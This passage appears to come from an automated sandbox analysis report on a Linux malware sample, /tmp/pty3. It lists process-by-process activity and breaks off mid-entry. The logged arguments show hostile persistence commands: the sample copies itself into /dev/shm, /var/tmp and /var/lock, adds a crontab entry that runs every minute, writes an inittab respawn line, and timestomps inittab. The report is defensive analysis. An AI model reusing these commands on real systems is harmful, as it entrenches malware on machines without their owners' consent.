MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5254 Parent PID: 5253

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5254 Parent PID: 5253

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab2
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: pty3 PID: 5255 Parent PID: 5228

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5255 Parent PID: 5228

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "rm -rf /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5256 Parent PID: 5255

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5256 Parent PID: 5255

General

Start time:	15:42:12
Start date:	21/12/2021
Path:	/usr/bin/rm
Arguments:	rm -rf /etc/inittab2
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: pty3 PID: 5257 Parent PID: 5228

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5257 Parent PID: 5228

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "touch -acmr /bin/ls /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5258 Parent PID: 5257

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: touch PID: 5258 Parent PID: 5257

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/ls /etc/inittab
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Chronological Activities

Analysis Process: pty3 PID: 5259 Parent PID: 5228

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: pty3 PID: 5261 Parent PID: 5259

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5261 Parent PID: 5259

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "cp -f /tmp/pty3 /dev/shm/pty3"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5263 Parent PID: 5261

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cp PID: 5263 Parent PID: 5261

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/usr/bin/cp
Arguments:	cp -f /tmp/pty3 /dev/shm/pty3
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Chronological Activities

Analysis Process: pty3 PID: 5265 Parent PID: 5259

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: pty3 PID: 5267 Parent PID: 5265

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5267 Parent PID: 5265

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -l \| grep /dev/shm/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /dev/shm/pty3 > /dev/null 2>&1 &\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5268 Parent PID: 5267

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5268 Parent PID: 5267

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5269 Parent PID: 5267

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5269 Parent PID: 5267

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/usr/bin/grep
Arguments:	grep /dev/shm/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5270 Parent PID: 5267

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5270 Parent PID: 5267

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v "no cron"
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5273 Parent PID: 5267

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5275 Parent PID: 5273

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5275 Parent PID: 5273

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5274 Parent PID: 5267

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5274 Parent PID: 5267

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty3 PID: 5266 Parent PID: 5259

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5266 Parent PID: 5259

General

Start time:	15:42:13
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab \| grep -v \"/dev/shm/pty3\" > /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5271 Parent PID: 5266

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5271 Parent PID: 5266

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: sh PID: 5272 Parent PID: 5266

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5272 Parent PID: 5266

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v /dev/shm/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: pty3 PID: 5276 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5276 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "echo \"0:2345:respawn:/dev/shm/pty3\" >> /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pty3 PID: 5277 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5277 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab2 > /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5278 Parent PID: 5277

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5278 Parent PID: 5277

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab2
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: pty3 PID: 5279 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5279 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "rm -rf /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5280 Parent PID: 5279

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5280 Parent PID: 5279

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/rm
Arguments:	rm -rf /etc/inittab2
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: pty3 PID: 5281 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5281 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "touch -acmr /bin/ls /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5282 Parent PID: 5281

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: touch PID: 5282 Parent PID: 5281

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/ls /etc/inittab
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Chronological Activities

Analysis Process: pty3 PID: 5283 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5283 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "cp -f /tmp/pty3 /var/tmp/pty3"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5284 Parent PID: 5283

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cp PID: 5284 Parent PID: 5283

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/cp
Arguments:	cp -f /tmp/pty3 /var/tmp/pty3
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Chronological Activities

Analysis Process: pty3 PID: 5285 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: pty3 PID: 5287 Parent PID: 5285

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5287 Parent PID: 5285

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -l \| grep /var/tmp/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/tmp/pty3 > /dev/null 2>&1 &\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5290 Parent PID: 5287

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5290 Parent PID: 5287

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5291 Parent PID: 5287

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5291 Parent PID: 5287

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/grep
Arguments:	grep /var/tmp/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5292 Parent PID: 5287

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5292 Parent PID: 5287

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v "no cron"
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5294 Parent PID: 5287

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5296 Parent PID: 5294

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5296 Parent PID: 5294

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5295 Parent PID: 5287

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5295 Parent PID: 5287

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty3 PID: 5286 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5286 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab \| grep -v \"/var/tmp/pty3\" > /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5288 Parent PID: 5286

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5288 Parent PID: 5286

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: sh PID: 5289 Parent PID: 5286

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5289 Parent PID: 5286

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v /var/tmp/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: pty3 PID: 5293 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5293 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "echo \"0:2345:respawn:/var/tmp/pty3\" >> /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: pty3 PID: 5297 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5297 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab2 > /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5298 Parent PID: 5297

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5298 Parent PID: 5297

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab2
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: pty3 PID: 5299 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5299 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "rm -rf /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5300 Parent PID: 5299

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5300 Parent PID: 5299

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/rm
Arguments:	rm -rf /etc/inittab2
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: pty3 PID: 5301 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5301 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "touch -acmr /bin/ls /etc/inittab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5302 Parent PID: 5301

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: touch PID: 5302 Parent PID: 5301

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/touch
Arguments:	touch -acmr /bin/ls /etc/inittab
File size:	100728 bytes
MD5 hash:	3859c173f5d3b37be3e531b7c84a9c68

Chronological Activities

Analysis Process: pty3 PID: 5303 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5303 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "cp -f /tmp/pty3 /var/lock/pty3"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5304 Parent PID: 5303

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cp PID: 5304 Parent PID: 5303

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/cp
Arguments:	cp -f /tmp/pty3 /var/lock/pty3
File size:	153976 bytes
MD5 hash:	40f10ae7ea3e44218d1a8c306f79c83f

Chronological Activities

Analysis Process: pty3 PID: 5305 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: pty3 PID: 5307 Parent PID: 5305

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5307 Parent PID: 5305

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "crontab -l \| grep /var/lock/pty3 \| grep -v \"no cron\" \|\| (crontab -l ; echo \"* * * * * /var/lock/pty3 > /dev/null 2>&1 &\") \| crontab -"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5310 Parent PID: 5307

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5310 Parent PID: 5307

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5311 Parent PID: 5307

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5311 Parent PID: 5307

General

Start time:	15:42:15
Start date:	21/12/2021
Path:	/usr/bin/grep
Arguments:	grep /var/lock/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5312 Parent PID: 5307

General

Start time:	15:42:15
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5312 Parent PID: 5307

General

Start time:	15:42:15
Start date:	21/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v "no cron"
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: sh PID: 5316 Parent PID: 5307

General

Start time:	15:42:15
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5318 Parent PID: 5316

General

Start time:	15:42:15
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5318 Parent PID: 5316

General

Start time:	15:42:15
Start date:	21/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -l
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: sh PID: 5317 Parent PID: 5307

General

Start time:	15:42:15
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: crontab PID: 5317 Parent PID: 5307

General

Start time:	15:42:15
Start date:	21/12/2021
Path:	/usr/bin/crontab
Arguments:	crontab -
File size:	43720 bytes
MD5 hash:	66e521d421ac9b407699061bf21806f5

Chronological Activities

Analysis Process: pty3 PID: 5306 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5306 Parent PID: 5259

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	sh -c "cat /etc/inittab \| grep -v \"/var/lock/pty3\" > /etc/inittab2"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5308 Parent PID: 5306

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: cat PID: 5308 Parent PID: 5306

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/cat
Arguments:	cat /etc/inittab
File size:	43416 bytes
MD5 hash:	7e9d213e404ad3bb82e4ebb2e1f2c1b3

Chronological Activities

Analysis Process: sh PID: 5309 Parent PID: 5306

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: grep PID: 5309 Parent PID: 5306

General

Start time:	15:42:14
Start date:	21/12/2021
Path:	/usr/bin/grep
Arguments:	grep -v /var/lock/pty3
File size:	199136 bytes
MD5 hash:	1e6ebb9dd094f774478f72727bdba0f5

Chronological Activities

Analysis Process: pty3 PID: 5315 Parent PID: 5259

General

Start time:	15:42:15
Start date:	21/12/2021
Path:	/tmp/pty3
Arguments:	n/a
File size:	48964 bytes
MD5 hash:	12cedf7cd63208ee8fd9d0359637c46c

Chronological Activities

Analysis Process: sh PID: 5315 Parent PID: 5259

General

Start time:	15:42:15
Start date:	21/12/2021
Path:	/bin/sh
